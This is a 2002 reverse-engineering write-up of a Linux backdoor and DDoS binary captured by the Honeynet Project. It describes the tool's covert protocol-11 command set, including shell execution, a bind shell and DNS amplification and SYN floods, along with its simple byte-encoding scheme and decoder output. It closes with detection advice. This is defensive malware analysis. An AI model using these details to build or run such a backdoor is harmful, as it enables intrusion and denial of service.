27 May 2002

Binary Purpose

The binary captured by the HoneyNet Project appears to be a Linux based combination backdoor and Distributed Denial of Service system. It contains no code to obtain root in the first place however, and as such requires a machine to be compromised first.

The binary appears to act as both a DDoS utility, and backdoor, all in one single binary package. It contains functionality to execute commands on a compromised host, as well as launching several kinds of DoS attacks. It is unclear which of these uses the tool was primarily designed to do.

One thing that does stand out for this binary is the anonymity built into it. It contains the abilities to both execute commands and launch attacks, all while having the ability not to give the true source of an attacker. Network traffic is even encoded to obfuscate what an attacker does.

Binary Capabilities

There is one thing that makes this binary interesting - it's full of features. The analysis paper documents the features in full detail, with this more or less being an analysis summary:

Binary Analysis

We first check what kind of binary it is, using the "file" command:

This tells us that the native OS for the binary was probably Linux. The binary will most likely work on just about any linux machine in the world since it was compiled for 80386 and also statically linked.

The fact that the binary has been stripped has two purposes for any blackhat. The process shrinks the binary's file size, but more importantly, it makes disassembling it *much* harder.

Disassembly

This is where all the hard work was done. A full disassembly was done on the non-executing binary in an attempt to put some kind of runtime structure to it.

The very first thing to be done was to get e_entry from the elf header:

Using the elf-header structure, we see that e_entry = 0x08048090. (Look at analysis document for more details)

Starting at this code point, GDB was used to disassemble the-binary. Nothing was found out of the ordinary in this section, in fact it followed a generic gcc-compiled binary format, equipped with startup, exit, and constructor/destructor (which were empty) sections too.

The code beginning at 0x8048134 matches a normal starting point for what C programmers would understand to be "main()". It should be noted that since the binary was stripped, no function could be identified by name, and all had to be analysed line by line to figure out what they do (this includes basic libc functions!). This was perhaps the most time-consuming part of the disassembly, and also most length to report on. As such, how functions were followed, and their purpose (and assumed real names) will not be shown here, but once again, are in the Analysis document.

Startup

There are checks in place to ensure the binary is running as root, if it discovers that it isn't then it will immediately exit.

argv[0] is replaced with a string "[mingetty]".

SIGCHLD is ignored, and two fork()'s are called. This will disassociate the binary from any parent process completely.

The current directory is changed to "/"

A socketcall that would look like this:

is called, effectively intercepting all protocol 11 packets.

Another socketcall is executed that looks like this:

Where X is the previously created socket, Y is a buffer, and 0x800 is the maximum number of bytes it will read from a packet.

The recv()'d data is then checked to have the following properties:

If the packet satisfies these three conditions, then it will be decoded and processed. If it doesn't satisfy any condition, a short sleep will occur and what looks to be a never ending loop is formed, with a jump back up to the recv().

Core Code

Going on the assumption of a matching packet, a function call to 0x804a1e8 is done, passing the data of the packet as one of the parameters. This function was named Data_Manipulation_Function_A in the analysis document and is examined in fine detail. The outcome of the analysis was that this function is a data decoder, and is used to decode network traffic.

This decoded network traffic is then analysed in a semi-protocol driven way. The deciding part of this 'protocol' is the second byte of the decoded data. It is checked by the program, and jumps off to different code depending on the value of this byte:

0x1 Status Request

Has the ability to tell the controlling client what the tool is currently doing. It also sends what is possibly a binary ID, version number. The 'information' packet is sent using a special function which deals with the covert nature of this tool's communications.

0x2 Blackhat Information

The blackhat's client is believed to be able to tell the tool what his/her IP address is. This is not as simple a process as it sounds. The author has placed at least 3 methods into the code that will attempt to do various obfuscation techniques on their true source (or at least their next hop). These range from using no decoy packets to using up to 10 settable decoy packets.

0x3 Execute Shell Command

Starting at the very next byte, a string is read. This string is executed using csh, and redirected into a file "/tmp/.hj237349". This file is then opened, read, and the data sent via the tool's covert communications channel. The file is then removed.

0x4 Execute DNS Traffic Amplification Attack

This section will call a function which was named Network_Function_C in the analysis document. This function was also disassembled and the traffic it produced analysed. It is believed to be a form of DoS attack, utilising DNS server replies from over 11 thousand preset DNS servers, to consume a victim's bandwidth. Some details of the flood, such as the victim and source port number, can be specified in the same decoded data packet.

0x5 Execute Corrupt Packet Attack

A call to Network_Function_D will occur. This function creates what appear to be IP fragments. The exact details of these are contained within the rest of the decoded data packet.

0x6 Create a Bind Shell

This binds /bin/sh to port 23281. This port is not usually bound, and as such is not viewable unless the blackhat specifically enables it via the protocol 11 packet.

0x7 Execute Command

Starting at the very next byte, a string is read. This string is executed using csh, but no output is kept.

0x8 Stop Executing

This function looks to be able to stop sections 4,5,6,9,10,11, and 12.

0x9 Execute DNS Traffic Amplification Attack (Timed)

This attack is just like section 0x4, except it appears to be able to control the speed of the packet flow.

0xA Execute SYN Flood Attack

This generates TCP SYN packets, once again using the rest of the decoded packet data to specify the victim, the destination port, and other things

0xB Execute SYN Flood Attack (Timed)

Identical to section 0xA, except the blachat can control the speed of the packet flow via the decoded data in the control packet.

0xC Execute DNS Request Flood

This attack is an inverse of the DNS Amplification Flood. It effectively makes requests from a single nameserver (presumed to be the victim). The details of the attack are once again contained in the decoded data.

Network Data Encoding Process

The communications channel between the blackhat and this tool looks to be encoded. All incoming packets that are processed by this binary are put through a decoder, and all outgoing packets are put through an encoder.

The disassembly analysis of Data_Manipulation_Function_A and Data_Manipulation_Function_B can be seen in the Analysis report. An explanation of how each works will be given here, along with a simple asm decoding routine.

The encoding/decoding process used by the binary is extremely simple. The asm routine (and one would expect the C code to generate it) is most certainly NOT simple however. It is quite possible that the author of this tool deliberately obfuscated these two functions by using extra variables, buffers, and functions to achieve what is possible in less than 15 lines of asm.

The encode routine (Data_Manipulation_Function_B) goes like this:

Original Data: A B C D

Encoded Byte 1 = (A + 23) % 256 = (A + 23) % 256

Encoded Byte 2 = ((A + 23) + B + 23) % 256 = (EB1 + B + 23) % 256

Encoded Byte 3 = (((A + 23) + B + 23) + C + 23) % 256 = (EB2 + C + 23) % 256

etc...

The decode routine (Data_Manipulation_Function_A) looks like:

Encoded Data: A B C D

Decoded Byte 1 = A - 23 + (X * 256)

Decoded Byte 2 = B - A - 23 + (X * 256)

Decoded Byte 3 = C - B - 23 + (X * 256)

etc..

where X is a number needed to make the sum positive

This makes the whole thing incredibly simple. In looking at the actual assembly code for the binary's equivalent functions, it takes hours to work out this simple process. The decoding function has calls to functions believed to be strcpy() and sprintf(). It also uses 2 nested loops. The strange thing about these, is that one simply overwrites the other, making it redundant. Then, an sprintf() is called which overwrites the second loop's output..... :)

This is quite likely to have been an obfuscation method, designed to make the decoding process more complex. Then again, it could just be really hopeless code...

The technique described above is a form of simplistic modulus encoding. While this technique is known, no matching algorithm to the one used could be found (especially with the sprintf and strcpy!). The usage of the value "23" seems odd since it doesn't really match up to anything specific. It is possible this acts as a form of 'key' for the encode/decode process. As such, it is highly possible that other versions of this tool exist that use different 'keys'.

The simplistic nature of this algorithm was only found by accident. Intentions were to write a decoder based upon Data_Manipulation_Function_A. Fortunately, one optimisation of that code led to another, and eventually the code unleashed all of its secrets:

A decoder for this tool has been included. covert_decode.c is a packet decoder for use with pcap-stored dump files such as those used by tcpdump and snort.

exploit-dev:/reverse# ./covert_decode -f snort.log

*snip!*

Blackhat DDOS Packet:
172.16.196.132 -> 172.16.183.2
CONTROL PACKET:
[Blackhat Source - "203.173.144.35"]
==========================================================
Blackhat DDOS Packet:
172.16.196.132 -> 172.16.183.2
CONTROL PACKET:
[Covert Shell Command - "rpcinfo -p 127.0.0.1"]
==========================================================

*snip!*

The above decode shows control packets. The first is telling the tool that the blackhat wishes responses to be directed to 203.173.144.35. The second decode shown above shows him/her executing an rpcinfo command on the local box. Further decodes reveal that the IP address seen in the "Blackhat Source" packet is indeed one of 9 destinations for outgoing covert packets.

Binary Network Traffic Detection

Detection of traffic associated with this type of tool is quite complex. There is a simple answer, and a long one.

Simple answer:

Any non-generic internet protocol (i.e. non-tcp/udp/icmp/igmp) can potentially carry communications for this tool. Detection of any of these protocols is best left to network sniffers such as tcpdump/snort. If it is possible (and if it's not, it may be in the future) to set up snort rulesets to log non-generic protocols, this may be a good idea. I do not believe it is possible to specify a particular protocol in a snort rule, at least not with the version i have (quite old).

A temporary measure may be as simple as logging all IP traffic, and then simply grepping out the known packets. A good start may even be to simply analyse network traffic for protocol 11 packets. The included covert_decode.c should be able to do this!

Another possible way of using traffic sniffers / analysers would be to watch for ICMP unreachable errors. Since the tool can send out several packets, some of the addresses will undoubtedly be valid. Most of these valid addresses would be expected to elicit some form of ICMP Destination Unreachable (Protocol Not Reachable) (Type 3, Code 2). These error messages being sent to a particular host could indicate it is compromised.

Long answer:

The problem with this tool is that it could easily be adapted to use known protocols such as TCP/ICMP/UDP. This makes detection even more difficult. The future possibilities for tools such as this one are limitless, with backdoor communications able to be passed across valid packets such as DNS or WWW requests. Future traffic detection of these sorts of tools is a difficult topic to tackle. It may be that detection will unfortunately be limited to detecting known configurations of various blackhat tools.

Current Tools:

Some network 'loggers' and 'sniffers' only listen for generic protocols. Some of them will not even pick packets such as those used by this particular binary. This is often not the fault of those packages, since they were not designed to pick up all traffic. There is a problem however with people using these types of packages and believing that they are seeing everything on their network.

Firewalls *should* help protect against these tools. They most certainly will defend against the captured binary, and probably many futures versions of it. The only downside to firewalls is that an improperly configured one may lead to a false sense of security when dealing with these tools.

As long as a very simple firewall principle is followed, intruders will have an extremely hard time implementing these types of tools to backdoor / abuse a network. This same principle should be nothing new:

"A firewall should block everything from a network except known traffic."

The question is, why do so many people still not do this? ...

Binary Protection

The captured binary was analysed expecting the absolute worst in tricky behavior. It was not run-time tested, it was not altered in any way to direct flows, and above all, NOTHING was assumed without reason. The binary was analysed, starting from e_entry to exit, looking for anything that could possibly be a trick.

Alas, nothing really difficult was found - I thought this was a challenge?!?! :)

The single biggest anti-reverse-engineering feature is the stripping of the symbols. It is quite likely that this was done deliberately to for this very effect. This meant that many calls, even the most basic ones, needed to be disassembled along with the author's code to see what each did. In some cases these 'basic' functions are so complex that personally, i could guarantee that code X was definately function Y. In the Analysis, explanations for assumptions have been given where possible. In the end:

It is understood that tools exist that are able to recognise some of these functions, particularly libc ones. Unfortunately i like doing things the hard (and precise) way :)

The second biggest difficulty, also probably deliberate, is the use of high compiler optimisations. Using optimisations during compiling often results in some strange looking assembly. Some function calls may be discarded in preference of shorter inline code. Some examples:

The compiler optimisations would also presumably hamper efforts for function-recognition tools. While none of these were used, it would be fair to assume that they would have at least some difficulty deciphering the different code (If i'm wrong on this, I apologise to the authors of those tools).

Lastly, and perhaps accidentally, the encoding/decoding functions in this binary look to have been obfuscated. Particularly with Data_Manipulation_Function_A (decoder), extra function calls and loops appear to have been added. These loops do this like "A = B; C = B; A = C;". That is, there is absolutely no purpose for them and in some cases they even undo each other! They most certainly put me in a position where i was prepared to not even *try* to analyse the logic of those functions. It must be realised too, that it could simply be a case that the author is a dope - you decide.

Similar Tools

Loki

One of the first covert communication tools (publicly) was discussed way back in 1996 in Phrack 49. It was by daemon9 and was named Loki.

The concept behind the idea is somewhat old now, but was based on the idea of sending data over ICMP echo/echo_reply packets because they were unlikely to be firewalled. Towards the end of that text:

Indeed, any protocol is vulnerable to covert data tunneling, and the author of this code has used that to his/her advantage.

TFN (Tribe Flood Network)

A very similar DDoS tool to this one is TFN. There are many, many similarities between this tool and TFN. Some feature similarities (from the tfn2k readme):

These similarities prompt one to consider this tool to simply be a revamped TFN2k. Indeed, there are even code similarities:

While coding structures cannot be reconstructed perfectly from disassembly code, it can be pieced together well enough to indicate that little (if any) code from TFN/TFN2k appears to have been used in the construction of this tool. Even the packet construction code differs, not just in the order but even in memory assignments and socket construction.

The ideas of the two however seem very similar, suggesting a copying of 'ideas' from TFN2k. The strange thing about the two tools is that one uses excellent code for one area (encryption for instance), and the other uses excellent routines for another (such as DDoS attacks). To assume one was created or derived from another leaves more questions than it answers.

Author Information

Unfortunately very little about the author can be obtained through the binary. We can get some technical details by running strings:

These details point to a linux machine that is at least 3-4 years old. This could also simply mean that an old linux machine was compromised and then used to compile the binary. Or there's always the unthinkable - that this binary is really 3-4 years old?

In running various strings in Google trying to get information on this binary, one post comes up of interest:

This linux machine appears to have been a victim as early as August 2001. One can assume this tool has been doing the rounds in some form or another for at least a year. This may indicate something about the skill level of the author(s)/user(s) since it appears to have gone undetected (or at least unreported) for so long.

The design of the binary is also quite interesting. It raises speculation about the author/user relationship:

These two points indicate that the author of the code is probably actively involved in the both the ongoing development and propagation of the tool.

As for the design / coding skills of the author:

Nonetheless, the author(s) do appear to have planned and coded the binary well.

Since the author is quite likely also a user of the tool, it would be interesting to see what interactions they had with the honeypot while it was infected.

Future Advancements

This tool displays some similar attributes to already known tools of similar purpose. Its use of a strange protocol could be seen as an advancement over other them (this could also be seen as a de-advancement). The use of DNS Amplification attacks was first officially reported by Auscert as early as 1999. The fact that they are still in use today suggests this particular flood isn't going to go away anytime soon.

With this in mind, advancements of this tool are not expected to be attack-based, but rather stealth based. Network traffic could undoubtedly be made to look like real traffic, making communications from the blackhat to these DDoS/backdoor tools even harder to detect.

The encryption system used in this binary is simplistic at best, and has really left the attacker open to sniffing by purpose-built sniffers. There are many encryption systems publicly available that would make this tool extremely difficult to deal with.

One must realise that there could be much more complexity to this tool than just this binary. If it has indeed been built on ideas from older products of a similar nature, it is possible it uses a hierarchy of hosts to conceal the blackhat's identity. Packets to this binary have a minimum size of 220bytes, making commands sent to several hosts a timely task. Other DDoS tools have used amplifier machines in the past to simplify (and anonymise) this task, something which is possibly already done and in use (and if not, should be expected). Perhaps the honeynet has a amplifier binary for a future reverse challenge? :)